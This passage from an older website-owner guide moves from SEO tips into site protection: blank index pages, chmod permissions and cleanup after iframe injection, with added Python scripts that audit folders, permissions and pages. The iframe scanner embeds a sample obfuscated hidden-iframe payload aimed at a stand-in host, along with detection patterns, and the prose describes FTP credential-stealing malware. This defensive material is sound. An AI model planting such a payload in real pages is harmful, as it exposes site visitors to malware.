I have found the most effective is to write articles and submit them to directories for publication distribution. In some cases, my articles have appeared before my website which helps in getting your website noticed earlier.

In your author biography make sure you include a link to your website as well as links in your article to your website.

I have found the following article submission locations very helpful in getting good backlinks:

http://www.articler.com/

http://www.goarticles.com/

http://www.articlesbase.com/

http://ezinearticles.com/

http://www.articlealley.com/

4. META Tags

Make sure your META TAGS are done right. Create good Meta Tags. Each page should have different keywords in the Title and the Description Meta Tag. Limit the number of times that you repeat words in your Keyword Meta Tag. Place your important keywords at the top of the page as text headers. Your most important page and keywords should be on the first page of a website.

I have found some websites that have on-line tools to help you create meta tags and to check your overall index page to see how "Spider" friendly it is. Search engines are like spiders that crawl the internet.

To help in creating Meta tags I have used the following:
http://www.submitcorner.com/Guide/Meta/

To see how spider friendly my Meta tags are, I use the following tools:
http://websitesubmit.hypermart.net/metataganalysis.htm
http://www.submitexpress.com/analyzer/
http://www.seocentro.com/tools/search-engines/metatag-analyzer.html

When you use these tools to check your website, you must also use your own logic. Suggestions are given but it must be up to you if and when you use them. Use them primarily as a guide as they have indeed helped my websites.

5. Monitoring Your Site

Once you have submitted your site to a search engine, be sure to find out from the FAQs listed (sometimes) on that particular search engine's site how it works.
For example:
Some search engines will automatically drop your listing after a preset time. Others won't.
Some search engines will penalize (even permanently 'ban' your site) if you re-submit it too often.

Bottom Line - make sure you find out these things about the search engine you are submitting to and then comply with their rules.

To check your Website ranking for a particular keyword go to the search engine whose position you want to check, and enter your keyword. You then need to go through the results and try to locate your Website URL in the results.

This manual method of checking your website's position/search engine ranking is both time consuming and tedious. It is however the most reliable and search engine friendly.

You can, however, also use some tools to find your page ranking until you arrive at the rank you want. You can then use the manual method.

I have found the following tools very helpful:
http://www.mikes-marketing-tools.com/ranking-reports/
http://www.seochat.com/seo-tools/pagerank-search/

Quite often, when people are creating their website, they tend to forget about adding website protection and security. It is critical that one adds homepage protection and security, as well as, individual web page protection and security. If information security is not implemented in your website design strategy, one can get leeching and hot linking of important digital files and images, as well as, illegal downloading of your digital products. It is vital that you add website protection in order to have universal protection security.


Website Protection Using The Index Page

All web servers are configured to display a default page for a directory if a default file exists. That is how your home page is found when someone simply enters a domain name for the URL for a web site and the home page is displayed. A server is configured to search a list of default file names and if it finds a match, it displays the page. The default files could be similar to what is shown below.

index.htm
index.html
index.shtml
index.php

When someone goes to your site by typing in your URL, the index page is what they normally see first. This prevents viewing other pages or files you may have in the root directory. What your visitor actually sees in this case is your home page.

The other directories (sub-folders) on your website, the ones below your root directory, which is typically called "public", or "public_html", do not normally have this index page. If the index page is not there, your visitor may be able to view every web page or file you have in that directory. A folder without an index page is open and everyone can find your product if they search for it. You thus should create an index page for all your folders.

You can verify whether or not your site is configured to prevent directory listing. You can test this by entering your URL domain name and a directory name for any directory that exists in your site in your web browser (e.g. http://www.yourdomain_name/temp). Doing this should generate a browser error page or list the contents of the directory.

If we assume you have a subdirectory named temp as given by the previous example, you will see the following if directory listing is not prevented.

Index of /temp

Name               Last Modified       Size
Parent Directory   30-Apr-2009 11:09   -
document1.txt      29-Apr-2009 10:03   20k
document2.pdf      28-Apr-2009 06:10   1831k
document3.doc      27-Apr-2009 09:10   568k

The above example shows the complete directory listing of the folder called temp. All someone has to do is to click on the file to open and possibly modify it. They can also download any of the files in the directory. If you happen to be in this situation, you need to add some website protection to your sub-folders.

We see then that if no index page exists on a server configured to prevent listings, an error is normally generated. But when a server is configured to allow a directory listing, the directory index is displayed rather than generating an error.

The index page can be used in any directory on a web site except those directories that already utilize an index page or default page. This includes the root directory. Never place one of these files in the root directory, never overwrite an index page or default page that already exists and never place an index page in a directory where another index page or default page already exists.

The subfolder index page does not have to be anything special. It can be a very simple HTML page as you are only using it to close the door on your folders. The following shows a simple index page you can use.
----------------------------------------------------------------------------------------------
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
</head>
<body>
</body>
</html>
-----------------------------------------------------------------------------------------------
The above would show a blank web page. Instead of seeing all the files that you have in sub-folder temp, they would simply see a blank web page.

If you want, you can put some text or graphics between <body> and </body>.
You can add some text that perhaps says: "Internal server error. Please contact system administrator."

The text will give the impression that the person trying to get into your site, caused some type of server error and so will hopefully stop them from going any further. The modified index page is shown below.

------------------------------------------------------------------------------------------------
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
</head>
<body>
<h1>Server Error</h1>
Internal server error. Please contact system administrator.
</body>
</html>
------------------------------------------------------------------------------------------------
You can also take the index web page one step further. You can redirect spying eyes from your website directories back to your home index page in your root directory. You can use what is called a "meta refresh" tag. The tag looks like the following:

<META HTTP-EQUIV="refresh" content="0;URL=http://www.yourdomain_name">

You would replace "yourdomain_name" with your actual domain name or whatever URL you would like to put there.

The following shows the index page with the meta refresh tag:
------------------------------------------------------------------------------------------------
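<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META HTTP-EQUIV="refresh" content="0;URL=http://www.yourdomain_name">
</head>
<body>
</body>
</html>
------------------------------------------------------------------------------------------------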

If you are using an index page with the meta-refresh tag only, then instead of someone seeing a blank web page, they actually get re-directed to your Home page. If this was a casual surfer who just happened to end up at your website by mistake, then they will find themselves on your Home front page, and, you might end up getting a customer, a good side benefit of the index.html page with meta-refresh tag.

To learn more about Website Protection and Security, please visit:

http://www.websiteprotection.net/

When you create an index page, it is important to use a pure text editor such as Notepad or an editor designed to create web pages. Never use Word or a word processor to create web pages. The files that word processors create contain formatting codes and other invisible information that can create problems with web servers. Also, when you save the index page, ensure that it has the proper file extension, e.g., index.html
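The check described above can be automated. The following Python script is an added example, not part of the original article: it walks a local copy of the site, reports every subdirectory that has none of the default index files listed earlier, and can put the blank placeholder page into each one without touching the root or overwriting an existing file. The function names and the sample folder layout built in demo() are assumptions made for the illustration.

```python
import os
import tempfile

# Default file names from the list above; a given server may be set up with others.
DEFAULT_INDEX_NAMES = ("index.htm", "index.html", "index.shtml", "index.php")

# The blank placeholder page shown above.
PLACEHOLDER = (
    '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" '
    '"http://www.w3.org/TR/html4/loose.dtd">\n'
    "<html>\n<head>\n</head>\n<body>\n</body>\n</html>\n"
)


def find_unindexed_dirs(web_root):
    """Return the subdirectories of web_root (as relative paths) that contain
    none of the default index files. The root itself is never reported."""
    web_root = os.path.abspath(web_root)
    missing = []
    for current, dirnames, filenames in os.walk(web_root):
        dirnames.sort()  # deterministic traversal order
        if current == web_root:
            continue
        if not set(filenames).intersection(DEFAULT_INDEX_NAMES):
            missing.append(os.path.relpath(current, web_root))
    return missing


def add_placeholder_indexes(web_root, relative_dirs, name="index.html"):
    """Create the blank page in each listed directory; never overwrite a file."""
    created = []
    for rel in relative_dirs:
        target = os.path.join(web_root, rel, name)
        try:
            # Mode "x" raises FileExistsError instead of replacing a file.
            with open(target, "x", encoding="ascii") as handle:
                handle.write(PLACEHOLDER)
        except FileExistsError:
            continue
        created.append(os.path.join(rel, name))
    return created


def demo():
    """Build a constructed site layout, then report before and after."""
    with tempfile.TemporaryDirectory() as root:
        for rel in ("temp", "images", os.path.join("downloads", "ebooks")):
            os.makedirs(os.path.join(root, rel))
        # The root and images/ already have an index page; temp/ holds a document.
        for rel in ("index.html",
                    os.path.join("images", "index.php"),
                    os.path.join("temp", "document1.txt")):
            open(os.path.join(root, rel), "w").close()
        before = find_unindexed_dirs(root)
        created = add_placeholder_indexes(root, before)
        after = find_unindexed_dirs(root)
        return before, created, after


if __name__ == "__main__":
    before, created, after = demo()
    print("open to listing:", before)
    print("placeholders created:", created)
    print("still open:", after)
```

Where you control the server configuration, switching directory listing off there (on Apache, Options -Indexes) covers every folder at once; the placeholder page is the fallback for hosts where you cannot.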

Website Protection and Security Using File and Directory CHMOD

A variety of files and directories in your website need to be given the correct permissions to work properly. Giving permissions to files or directories in the Unix world is called CHMOD (change mode). Chmod is a Unix command that lets permission levels be assigned to each file or directory. The proper CHMOD is also needed to help you with your website protection and security. As you will see later in this document, you can use your FTP client to change the file permissions in order to protect your files.

Every file or folder in UNIX has access permissions. There are three types of permissions (what you are allowed to do with a file):

1) read access
2) write access
3) execute access

These specific permissions apply as follows:

Read
The read permission grants the ability to read a file. When set for a directory, this permission grants the ability to read the names of files in the directory (but not to find out any further information about them, including file type, size, ownership, permissions, etc.).

Write
The write permission grants the ability to modify a file. When set for a directory, this permission grants the ability to modify entries in the directory. This includes creating files, deleting files, and renaming files.

Execute
The execute permission grants the ability to execute a file. This permission must be set for executable binaries (for example, a compiled C++ program) or scripts (for example, a shell script or a Perl program) in order to allow the operating system to run them. When set for a directory, this permission grants the ability to traverse its tree in order to access files or subdirectories, but not to see the files inside the directory (unless read is set).

When a permission is not set, the rights it would grant are denied. Files created within a directory will not necessarily have the same permissions as that directory.

Access permissions for files and folders mean different things from the user standpoint. The following shows the difference:

Read Access For File:
On a regular file, the read permission bit means the file can be opened and read
Read Access For Directory:
On a directory, the read permission means you can list the contents of the directory.

Write Access For File:
On a regular file, this means you can modify the file, that is, write new data to the file and change its contents
Write Access For Directory:
In the case of a directory, the write permission means you can add, remove, and rename files in the directory. This means that if a file has the write permission bit, you are allowed to modify the file's contents, but you're allowed to rename or delete the file only if the permissions of the file's directory allow you to do so

Execute Access For File:
In the case of a regular file, this means you can execute the file as a program or a shell script
Execute Access For Directory:
On a directory, the execute permission (also called the "search bit") allows you to access files in the directory and enter it, with the cd command, for example. However, note that although the execute bit lets you enter the directory, you're not allowed to list its contents, unless you also have the read permissions to that directory

Every file on your Linux system, including directories, is owned by a specific user and group. Therefore, file permissions are defined separately for users, groups, and others.

Permissions are defined for three types of users:
1) the owner of the file
2) the group that the owner belongs to
3) other users

User Type - USER(u):
The username of the person who owns the file. By default, the user who creates the file will become its owner.
User Type - GROUP(g):
The usergroup that owns the file. All users who belong to the group that owns the file will have the same access permissions to the file. This is useful if, for example, you have a project that requires a bunch of different users to be able to access certain files, while others can't. In that case, you'll add all the users into the same group, make sure the required files are owned by that group, and set the file's group permissions accordingly.
User Type - OTHER(o):
A user who isn't the owner of the file and doesn't belong in the same group the file does. In other words, if you set a permission for the "other" category, it will affect everyone else by default. For this reason, people often talk about setting the "world" permission bit when they mean setting the permissions for "other."

The mode number consists of three octal digits, n1n2n3, representing the access allowed for yourself, for your group (other users set up on your account), and for everyone else. The value of each digit represents the type of access that is allowed.

Each digit in the mode parameter represents the permissions for a user or a class of users. The first digit corresponds to the owner of the file. The second digit corresponds to the file's group. The final digit corresponds to everybody else.

We can also say that the first digit, n1, on the left, stands for the owner of the file or directory. The middle digit, n2, represents the group who owns the file or directory. The last digit, n3, represents the rest of the world.

Binary   Octal digit   Permission
000      0             no permissions enabled
001      1             execute permission enabled
010      2             write permission enabled
011      3             write and execute are both enabled
100      4             read permission enabled
101      5             read and execute are both enabled
110      6             read and write are both enabled
111      7             read, write and execute are all enabled

We see from the above table that:

1) read is given a value of 4
2) write is given a value of 2
3) execute is given a value of 1

This then is translated by adding the values together for each of the groups of permissions.

For example, let us say the CHMOD is n1n2n3 = 755 = user/group/other; what does this mean:

i) user can read (4), write (2) and execute (1) : 4 + 2 + 1 = 7
ii) group can read (4) and execute (1) : 4 + 0 + 1 = 5
iii) others can read (4) and execute (1) : 4 + 0 + 1 = 5

If the group had the same permissions as the user then we would have 775.

Instead of numbers for the mode, we could also have letters as follows:

1) read = r (4)
2) write = w (2)
3) execute = x (1)
4) not enabled = - (0)

We can then make 755 = rwx r-x r-x
where:
user = rwx
group = r-x
other = r-x

If we had 765 then this would be the same as rwx rw- r-x

You can also see users defined by letters as follows:

1) user = u
2) group = g
3) others = o
4) everybody = a

Usually, only the file owner can change permissions.

Although a shell prompt in a Unix-like environment can be used to do this, an FTP client is often used for this task. Depending on the FTP client being used, CHMOD is usually available through menus or by simply clicking the right mouse button when hovering over a file or directory and choosing the chmod/property option. To set the permissions, check the properties or enter the corresponding chmod numbers in the dialogue box.

For more information you can visit the following:

http://www.websiteprotection.net

On a web server, files are usually set to 644. This indicates that the file owner can read and write to the file, while everyone else can only read it. Directories are commonly set to 755. This indicates that the directory owner has full control, while everyone else can list the directory and access the files within it.

Most common file permissions:

Files: 644
Folders: 755 (with index page in it)
Images: 644
CGI scripts: 755
PHP scripts: 644

By default, your public_html (or public) directory should be rwxr-xr-x (755).
With this setting, if a Web surfer connects to your domain, the server will display either your home page (if a file with the name index.html, index.htm, or index.shtml exists) or a listing of all the files in that directory.

Your other option for your public_html (or public) directory is rwx--x--x (711).
This permission setting will not show a file listing.
If there is no home page, the Web surfer will receive a "Forbidden" error message.

You should take care in setting files CHMOD 777. This basically means anyone can read/write/execute/search the file/directory. In this situation you are leaving your web pages open to the world and making it easy for people to hack your website.

As an owner, you need to read, write and execute the files.
As a group certain web server applications or people need to read and execute your files.
As ‘others’, the whole world needs to read and execute your files.
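The arithmetic above, as an added Python example that is not part of the original article: it converts between the octal and letter forms of a mode and walks a directory tree reporting anything the "other" class can write to, which is what a 777 or 666 setting allows. The function names and the sample tree built in demo() are assumptions made for the illustration.

```python
import os
import stat
import tempfile


def octal_to_letters(mode):
    """0o755 -> 'rwxr-xr-x'. Each digit is read (4) + write (2) + execute (1)."""
    letters = []
    for shift in (6, 3, 0):  # user, group, other
        digit = (mode >> shift) & 0o7
        letters.append("r" if digit & 4 else "-")
        letters.append("w" if digit & 2 else "-")
        letters.append("x" if digit & 1 else "-")
    return "".join(letters)


def letters_to_octal(text):
    """'rwx rw- r-x' -> 0o765. Spaces between the three groups are optional."""
    chars = text.replace(" ", "")
    if len(chars) != 9:
        raise ValueError("expected nine permission characters, got %r" % text)
    mode = 0
    for position, char in enumerate(chars):
        if char == "rwx"[position % 3]:
            mode |= 1 << (8 - position)  # position 0 is the user read bit
        elif char != "-":
            raise ValueError("unexpected %r at position %d" % (char, position))
    return mode


def find_world_writable(root):
    """Return (relative path, octal mode, letters) for every file or directory
    under root whose 'other' digit includes write (2), for example 777 or 666."""
    findings = []
    for current, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic traversal order
        for name in dirnames + sorted(filenames):
            path = os.path.join(current, name)
            info = os.lstat(path)
            if stat.S_ISLNK(info.st_mode):
                continue  # a symbolic link's own mode bits are not meaningful
            mode = stat.S_IMODE(info.st_mode)
            if mode & stat.S_IWOTH:
                findings.append((os.path.relpath(path, root),
                                 "%03o" % mode,
                                 octal_to_letters(mode)))
    return findings


def demo():
    """Build a small constructed site tree and audit it."""
    layout = [  # (relative path, is directory, mode), constructed sample
        ("cgi-bin", True, 0o755),
        (os.path.join("cgi-bin", "form.cgi"), False, 0o755),
        ("uploads", True, 0o777),
        ("config.php", False, 0o666),
        ("index.html", False, 0o644),
    ]
    with tempfile.TemporaryDirectory() as root:
        for rel, is_dir, mode in layout:
            path = os.path.join(root, rel)
            if is_dir:
                os.mkdir(path)
            else:
                open(path, "w").close()
            os.chmod(path, mode)  # explicit chmod, so the umask does not matter
        return find_world_writable(root)


if __name__ == "__main__":
    print(octal_to_letters(0o755), "%03o" % letters_to_octal("rwx rw- r-x"))
    for row in demo():
        print(row)
```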

Website Protection Against iFrame Injections

If you have had an iframe injection attack, it is critical that you perform a thorough cleaning of your PC and any other PC that can FTP to your website. The hackers may be attacking your website via a virus that they may have downloaded to your computer without you realizing it. Even though you change passwords, and remove the iframes, you may still be vulnerable to iframe injections.

The virus will take your new passwords and make them available to the hacker. First, it knows the files and default locations of various FTP software, FileZilla, WS_FTP and many, many others. When users tell their software to save their logon credentials, it saves this information in a file on the computer. Then when you want to send an update to your website, the login information is already there.

The virus looks for these files, opens them, reads the information and then sends it to a server where it's used to login to the website with valid credentials. There's no need to "crack" the password, which is why strong passwords aren't a defense in this case.

Second, the virus may install a keyboard logger. With everyone telling people not to save their FTP username and passwords, hackers started installing keyboard loggers for those who type their passwords in each time. Again, the stolen information is sent to a server that infects the web site.

Third, the virus "sniffs" the FTP traffic leaving the PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see the username and password, capture it, and send it to a server.

Fourth, the virus will inject the malscript (the infectious iframe) into the FTP data stream as it leaves the user's PC. This variant is sneaky in that the website logs will show that FTP traffic originated from a valid source, with valid FTP credentials.

Depending on the virus on your computer, you may have to install a new anti-virus program. The virus may know how to evade detection by the current anti-virus. It doesn't matter what's being used currently, you may have to install something different.

Once you believe you have removed the iframe injections from your web pages, perform a complete virus scan of your PC before you start to change passwords. This will at least ensure that any new passwords will not be available to the hacker if the virus has been removed.

Use iframe scan tools on a daily basis to check for iframe injection attacks. You can find out more information on the scan tools and how to remove iframe injections by visiting:

http://www.websiteprotection.net

Then, should you have an iframe injection again, it is probably not the result of a faulty script or weak FTP passwords, but the result of a virus on your PC with FTP access to the infected website. You need to remove this virus before creating new passwords.

You can use the following protection methods:
1) Scan and thoroughly clean your PC
2) Change all your FTP passwords
3) Change your hosting and database passwords
4) Check all files for this iframe injection, not just index pages. It could be anywhere you have a <body> tag. Use the iframe scan tools daily
5) Check all your .htaccess files, you might find one in every folder, created by this virus. Make sure it is your .htaccess file and has not been modified.
6) Check your web page CHMOD file permissions

When you have fixed your iframe problems, you shouldn't think of it as "I installed security, I'm good now" but rather use it as an opportunity to tighten up the server. You should do that because even the latest software might have some holes in it which can be used.
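A minimal version of the daily scan in step 4, as an added Python example (it is not one of the scan tools mentioned above and not code from the original article): it flags iframes that are 1x1, zero-sized or hidden by style, both in the page as written and inside strings passed to unescape(), the kind of obfuscation described elsewhere on this blog. The sample page, its example.invalid addresses and all function names are constructed for the illustration.

```python
import os
import re

UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)
ESCAPE_SEQ = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
# width or height of exactly 0 or 1 (quoted or not); 10, 100 and 10% do not match.
TINY_SIZE = re.compile(r"\b(?:width|height)\s*=\s*[\"']?\s*[01](?:px)?(?![\w.%])", re.I)
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
SCAN_EXTENSIONS = (".htm", ".html", ".shtml", ".php", ".js")

# Constructed sample: one ordinary embedded frame and one injected, escaped frame.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://video.example.invalid/embed/1" width="560" height="315"></iframe>
<script language="javascript">
document.write(unescape('%3Ciframe src=http://ads.example.invalid/ width=1 height=1 style=%22visibility:hidden%22%3E%3C/iframe%3E'));
</script>
</body></html>
"""


def js_unescape(text):
    """Decode %XX and %uXXXX sequences as JavaScript's unescape() does."""
    return ESCAPE_SEQ.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def scan_text(text):
    """Return one finding per suspicious iframe tag in text.

    Two layers are searched: the text as written ("plain") and the decoded
    argument of every unescape('...') call ("unescape")."""
    layers = [("plain", text)]
    layers += [("unescape", js_unescape(m.group(2)))
               for m in UNESCAPE_CALL.finditer(text)]
    findings = []
    for layer, content in layers:
        for match in IFRAME_TAG.finditer(content):
            tag = match.group(0)
            reasons = []
            if layer == "unescape":
                reasons.append("written by unescape()")
            if TINY_SIZE.search(tag):
                reasons.append("1x1 or zero size")
            if HIDDEN_STYLE.search(tag):
                reasons.append("hidden by style")
            if reasons:  # a visible iframe in plain HTML is not reported
                findings.append({"layer": layer, "tag": tag, "reasons": reasons})
    return findings


def scan_tree(root):
    """Scan every web file under root, not just index pages.
    Returns {relative path: findings} for files with at least one finding."""
    report = {}
    for current, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(current, name)
            with open(path, encoding="utf-8", errors="replace") as handle:
                found = scan_text(handle.read())
            if found:
                report[os.path.relpath(path, root)] = found
    return report


if __name__ == "__main__":
    for finding in scan_text(SAMPLE_PAGE):
        print(finding["layer"], finding["reasons"], finding["tag"])
```

These patterns are heuristics: a script that assembles the tag some other way, for example by joining string pieces, will not be caught, so a clean result is a first pass and not proof that the files are clean.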

Website Protection and Security

The growth of the internet has provided website owners with unique business opportunities. Unfortunately, that growth also attracts those who want to steal your website files and sensitive information. As your website grows and it moves to the top ten page ranking on the major search engines, it will also be that much easier for bandits to find your website. They can then easily change your files, damage them or steal them if you do not have website security.

Quite often, when people are creating their website, they tend to forget about adding website protection and security. It is critical that one adds homepage protection and security, as well as, individual web page protection and security. If information security is not implemented in your website design strategy, one can get leeching and hotlinking of important digital files and images, as well as, illegal downloading of your digital products.

If they are selling through a secure website, such as PayPal, they expect this is enough. Unfortunately, this is the wrong attitude to take. Sure, your money may be safe, but it is the loss of potential money that you need to worry about. You must have overall website protection and security to prevent hacking attempts that can download your digital products illegally and cause you loss of income potential. You must add website protection and security if you are to have information security to prevent illegal downloads of all your digital files and images.

Now you can easily learn, on a step-by-step basis with plenty of examples, how to prevent web surfers from purposely or accidentally hacking your website. You will learn how to add powerful website protection and security monitoring tools to hide your product links, minimize website security threats, as well as, advise you on website security issues and the security actions to take.

Your cost to implement this protection is minimal, or in some cases, FREE.

With the amazing ebook: "How To Protect Your Website And Digital Download Products",

you will quickly learn how to retrieve the following security information from your website:

1) Visitor Internet IP address
2) The date and time your visitors arrived at your website
3) The domain or web page that your visitors came from to access your web pages
4) The total number of your product downloads
5) Any illegal product downloads

Visit:

http://www.websiteprotection.net

to get a Free Preview of this amazing ebook.

You will learn how to stop hotlinking and leeching of your digital download products in order to get internet website protection and security. Is getting hacked a risk you can afford to take? It could cost you and your business tens of thousands of dollars. Website security is a critical component of the success of any web based business.

You will also learn how to detect and fight against iframe injections. An iframe injection is an injection of one or more iframe tags into a page's content. The iframe typically does something bad, such as downloading an executable application that contains a virus or worm in it… something that compromises a visitor's system. Iframe injection can cause your website to be flagged by the major search engines, such as Google, as being a "bad" site because it is hosting "malware". When your site appears on the search page, it will be marked with a note indicating visitors could be at risk if they continue to your website. This could essentially remove all traffic to your site causing you thousands of dollars in lost revenue.

There are plenty of people on the internet trying to sell you high price security along with monthly fees, but none tell you about the security features that are readily available to you on the internet involving minimum or no costs to you.

Whatever... let "How To Protect Your Website And Digital Product Downloads" help you come up with the best economical security for your Website.

This ebook will help you learn the secrets that the security gurus do not want you to know, without wasting your time searching for information scattered all over the internet. Time is a precious commodity and you need to use it wisely.

Go now to:

http://www.websiteprotection.net

Once you have the secrets, you can quickly protect and secure your website from hackers and illegal downloading of your products.
Website security and monitoring is a vital part of the success of your online business. Making it a priority is crucial for your website file and data protection. Understanding that and taking the steps to properly implement website security practices can mean increased sales and more business opportunities.